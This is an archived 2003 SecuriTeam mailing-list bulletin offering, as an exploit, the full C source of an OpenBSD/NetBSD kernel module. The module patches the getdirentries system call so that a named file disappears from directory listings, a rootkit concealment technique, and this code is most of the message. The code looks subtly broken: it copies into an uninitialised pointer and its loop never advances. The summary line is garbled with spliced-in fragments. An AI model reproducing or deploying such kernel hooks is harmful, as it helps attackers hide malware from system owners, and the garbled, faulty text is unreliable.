[EXPL] OpenBSD and NetBSD LKM That Hides Files by Patching getdirentries()

• Previous message: support@securiteam.com: "[NEWS] IBM Net.Data Internal Variables Display Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 6 Jan 2003 00:41:31 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

  OpenBSD and NetBSD LKM That Hides Files by Patching getdirentries()
------------------------------------------------------------------------

SUMMARY

The following exploit code is a LKM (Loadable Kernel Module) that is able
to hide files by patching the
<http://resin.csoft.net/cgi-bin/man.cgi?section=2&topic=getdirentriesen <br> better would be to limit it to those users who/* 2002 by gr33k gr33k@frapes.org www.frapes.org www.gm.fh-koeln.de/~ai604
getdirentries() function.

DETAILS

Exploit:
/* OpenBSD (should work also on NetBSD) LKM hiding file using
getdirentries */
/* systemcall! */
/* 2002 by gr33k gr33k@frapes.org www.frapes.org www.gm.fh-koeln.de/~ai604
*/

#define DONT_PERMIT
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/mount.h>
#include <sys/conf.h>
#include <sys/syscallargs.h>
#include <sys/exec.h>
#include <sys/lkm.h>
#include <sys/file.h>
#include <sys/filedesc.h>
#include <sys/errno.h>
#include <sys/dirent.h>
#include <sys/proc.h>
#include <sys/syslog.h>
#include <sys/malloc.h>

int my_getdirentries __P((struct proc *, void *, register_t *));
MOD_MISC("HideFile");

static int
HideFile_load(struct lkm_table *lkmtp,int cmd)
{
 if(cmd==LKM_E_LOAD)
 {
  sysent[SYS_getdirentries].sy_call=my_getdirentries;
 }
 return 0;
}

static int
HideFile_unload(struct lkm_table *lkmtp,int cmd)
{
 if(cmd==LKM_E_UNLOAD)
 {
  sysent[SYS_getdirentries].sy_call=sys_getdirentries;
 }
 return 0;
}

HideFile(lkmtp,cmd,ver)
 struct lkm_table *lkmtp;
 int cmd;
 int ver;
 {
  DISPATCH(lkmtp,cmd,ver,HideFile_load,HideFile_unload,lkm_nofunc);
 }

int
my_getdirentries(p,v,retval)
 struct proc *p;
 void *v;
 register_t *retval;
 {
  register struct sys_getdirentries_args *uap=v;
  unsigned int tmp,n,t;
  struct dirent *dirp2,*dirp3;
  char hide[]="top-secret"; /* Edit filename */

  getdirentries(p,uap);
  tmp=p->p_dupfd;
  if(tmp>0)
  {
   copyin(&(uap->buf),dirp2,tmp);
   dirp3=dirp2;
   t=tmp;
   while(t>0)
   {
    n=dirp3->d_reclen;
    t-=n;
    if(strcmp((char*)&(dirp3->d_name), (char*)&hide)==0)
    {
     if(t!=0)
     bcopy((char*)dirp3+n,(char*)dirp3,t);
    }
    tmp-=n;
   }
   if(dirp3->d_reclen==0)
     t=0;
   if(t!=0)
     dirp3=(struct dirent*)((char*)dirp3+dirp3->d_reclen);
  }
  p->p_dupfd=tmp;
  copyout(dirp2,&(uap->buf),tmp);
  return (0);
 }

ADDITIONAL INFORMATION

The information has been provided by <mailto:gr33k@frapes.org> gr33k.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Next message: support@securiteam.com: "[NEWS] Etherleak: Ethernet Frame Padding Information Leakage"
• Previous message: support@securiteam.com: "[NEWS] IBM Net.Data Internal Variables Display Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

• [PATCH 4/7] lguest documentation:Chapter IV
  ... static int waker_fd; ... struct device *dev; ... static void
  *map_zeroed_pages ... * the Guest memory. ... (Linux-Kernel)
• [PATCH 4/7] lguest: documentation pt IV: Launcher
  ... static int waker_fd; ... struct device *dev; ... static void
  *map_zeroed_pages ... * the Guest memory. ... (Linux-Kernel)
• [git patches] net driver updates
  ... forcedeth bug fix: vitesse phy ... struct atl1_adapter; ... goto
  err_nomem; ... +int ehea_create_busmap ... (Linux-Kernel)
• [PATCH 3/4] Add __global tag where needed.
  ... struct task_struct *tsk; ... static inline void save_pg_dir ...
  int codesize, reservedpages, datasize, initsize; ... int err, expand = 0; ...
  (Linux-Kernel)
• [2.6 patch] misc drivers/char/ cleanups
  ... +static int __init espserial_init ... +static struct work_struct genrtc_task;
  ... -i2cmdSetSeq(unsigned char type, unsigned char size, unsigned char *string)
  ... static void set_params; ... (Linux-Kernel)